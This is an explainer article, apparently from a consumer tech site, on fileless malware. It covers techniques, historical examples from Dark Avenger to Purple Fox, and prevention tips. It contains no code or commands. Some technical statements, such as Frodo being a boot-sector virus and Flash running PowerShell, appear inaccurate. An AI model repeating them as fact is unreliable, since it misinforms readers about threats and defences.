The cyberworld is rife with security incidents. While most cyberattacks need some type of bait to infiltrate your system, the dauntless fileless malware lives off the grid and infects by turning your legitimate software against itself.
But how does the fileless malware attack if it does not use any files? What are the most common techniques it employs? And can you protect your devices from fileless malware?
How Does Fileless Malware Attack?
Fileless malware attacks by playing on the pre-existing vulnerabilities inside your installed software.
Common examples include exploit kits that target browser vulnerabilities to command the browser to run malicious code, using Microsoft's Powershell utility, or by targeting macros and scripts.
Since the code for these attacks is not stored in a file or installed on the victim's machine, it loads malware directly into memory as the system commands and runs instantly.
The absence of executable files makes it difficult for traditional antivirus solutions to spot them. Naturally, this makes fileless malware all the more dangerous.
Common Techniques Used by Fileless Malware
Fileless malware does not need code or files to launch but it does require modification of the native environment and tools that it tries to attack.
Here are some common techniques that fileless malware uses to target devices.
Exploit Kits
Exploits are pieces of "exploited" code or sequences and an exploit kit is a collection of exploits. Exploits are the best way to launch a fileless attack as they can be injected directly into memory without the need to write anything to disk.
An exploit kit attack is launched in the same manner as a typical attack, where the victim is lured through phishing emails or social engineering tactics. Most kits include exploits for a number of pre-existing vulnerabilities into the victim's system and a management console for the attacker to control it.
Malware That Resides In Memory
A type of malware known as registry resident malware is used extensively by fileless attacks. This malicious code is programmed to launch every time you open the OS and remains hidden inside the native files of the registry.
Once fileless malware is installed in your Windows registry, it can remain there permanently, avoiding detection.
Memory-Only Malware
This type of malware only resides inside memory.
Attackers mostly employ widely used system administration and security tools—including PowerShell, Metasploit, and Mimikatz—to inject their malicious code into your computer's memory.
Stolen Credentials
Stealing credentials to carry out a fileless attack is very common. Stolen credentials can be easily used to target a device under the pretense of the real user.
Once attackers get hold of a device through a stolen credential, they can use the native tools such as Windows Management Instrumentation (WMI) or PowerShell to perform the attack. Most cybercriminals also create user accounts to gain access to any system.
Examples of Fileless Attacks
Fileless malware has been around for quite a while but only emerged as a mainstream attack in 2017 when kits that integrate calls to PowerShell were created by threat actors.
Here are some interesting examples of fileless malware, some of which you'll no doubt have heard about.
The Dark Avenger
This is a precursor to fileless malware attacks. Discovered in September 1989, it required a file as an initial delivery point but later operated inside the memory.
The main aim behind this attack was to infect executable files every time they were run on an infected computer. Even the copied files would get infected. The creator of this attack is famously known as the "Dark Avenger".
Frodo
Frodo is not a fileless attack in the true sense but it was the first virus that was loaded into the boot sector of a computer thus making it partially fileless.
It was discovered in October 1989 as a harmless prank with an aim to flash a message "Frodo Lives" on the screens of infected computers. However, due to the badly written code, it actually turned into a destructive attack for its hosts.
Operation Cobalt Kitty
This famous attack was discovered in May 2017 and was executed on the system of an Asian corporation.
The PowerShell scripts used for this attack were linked with an external command and control server which enabled it to launch a series of attacks, including the Cobalt Strike Beacon virus.
Misfox
This attack was identified by the Microsoft Incident Response team back in April 2016. It employs the fileless methodologies of running commands through PowerShell as well as gaining permanence through registry infiltration.
Since this attack was spotted by the Microsoft security team, a bundling solution to protect from this malware has been added in Windows Defender.
WannaMine
This attack is carried out by mining cryptocurrency on the host computer.
The attack was first spotted in mid-2017 while running in memory without any traces of a file-based program.
Purple Fox
Purple Fox was originally created in 2018 as a fileless downloader trojan that required an exploit kit to infect devices. It resurfaced in a reconfigured form with an additional worm module.
The attack is initiated by a phishing email that delivers the worm payload which automatically scans for and infects Windows-based systems.
Purple Fox can also use brute force attacks by scanning for vulnerable ports. Once the target port is found, it is infiltrated to propagate the infection.
How to Prevent Fileless Malware
We've established how dangerous fileless malware can be, especially because some security suites can't detect it. The following five tips can help mitigate any genre of fileless attacks.
1. Don't Open Suspicious Links and Attachments
Email is the biggest entry point for fileless attacks as naive email users can be lured into opening malicious email links.
Don't click on links you're not 100 percent sure about. You can check where the URL ends up first, or gather whether you can trust it from your relationship with the sender and the contents of the email otherwise.
Also, no attachments sent from unknown sources should be opened, specifically the ones containing downloadable files like PDFs and Microsoft Word documents.
2. Don't Kill JavaScript
JavaScript can be a great influencer for fileless malware but disabling it completely does not help.
Besides the fact that most pages you visit will either be empty or missing elements, there is also a built-in JavaScript interpreter in Windows that can be called from within a web page without the need for JavaScript.
The biggest drawback is that it can provide you with a false sense of security against fileless malware.
3. Disable Flash
Flash utilizes the Windows PowerShell Tool to execute commands using the command line while it is running in memory.
To properly protect from fileless malware, it is important to disable Flash unless really necessary.
4. Employ Browser Protection
Protecting your home and work browsers is the key to preventing fileless attacks from spreading.
For work environments, create an office policy that only allows one browser type to be used for all desktops.
Installing browser protection like the Windows Defender Application Guard is very helpful. A part of Office 365, this software was written with specific procedures to protect against fileless attacks.
5. Implement Robust Authentication
The main culprit behind the spread of fileless malware is not the PowerShell, but rather a weak authentication system.
Implementing robust authentication policies and limiting privileged access by implementing the Principle Of Least Privilege (POLP) can significantly reduce the risk of fileless malware.
Beat Fileless Malware
Leaving no trail behind, fileless malware leverages the built-in "safe" tools in your computer to carry out the attacks.
However, the best way to beat fileless or any malware is to gain awareness and understand the different techniques used in carrying out these attacks.